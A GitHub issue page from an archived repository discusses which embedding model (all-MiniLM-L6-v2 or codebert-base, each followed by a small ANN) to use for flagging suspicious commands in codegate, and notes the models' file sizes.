You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository was archived by the owner on Jun 5, 2025. It is now read-only.
As a baseline we decided to use the hybrid-all-MiniLM-L6-v2 with post-processing by a small ANN. We didn't want the extra cost of codebert, but the local ANN seems to produce some benefit.
Additional Context
We need to decide which model to use for the embeddings. all-minilm-L6-v2 works well, especially with a post ANN process step. It is already in codegate, so we get it for free. microsoft/codebert-base works better as expected, but at a cost of 476 MB.
The ANNs are much smaller
ls -lh | grep hybrid
-rw-r--r-- 1 nigel staff 228K 29 Jan 18:21 hybrid-all-MiniLM-L6-v2.model
-rw-r--r-- 1 nigel staff 420K 29 Jan 18:21 hybrid-microsoft-codebert-base.model
Description
We have done some work to spot suspicious commands in #34. The task here is to write this code into codegate. This involves
Extensions for the future
We will probably have to intercept the commands at
and write the comment back at
As a baseline we decided to use the
hybrid-all-MiniLM-L6-v2with post-processing by a small ANN. We didn't want the extra cost of codebert, but the local ANN seems to produce some benefit.Additional Context
We need to decide which model to use for the embeddings. all-minilm-L6-v2 works well, especially with a post ANN process step. It is already in codegate, so we get it for free. microsoft/codebert-base works better as expected, but at a cost of 476 MB.
The ANNs are much smaller
ls -lh | grep hybrid
-rw-r--r-- 1 nigel staff 228K 29 Jan 18:21 hybrid-all-MiniLM-L6-v2.model
-rw-r--r-- 1 nigel staff 420K 29 Jan 18:21 hybrid-microsoft-codebert-base.model